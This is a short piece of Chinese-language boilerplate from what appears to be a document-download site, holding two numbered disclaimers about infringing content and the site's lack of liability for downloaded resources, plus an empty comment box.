  • 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論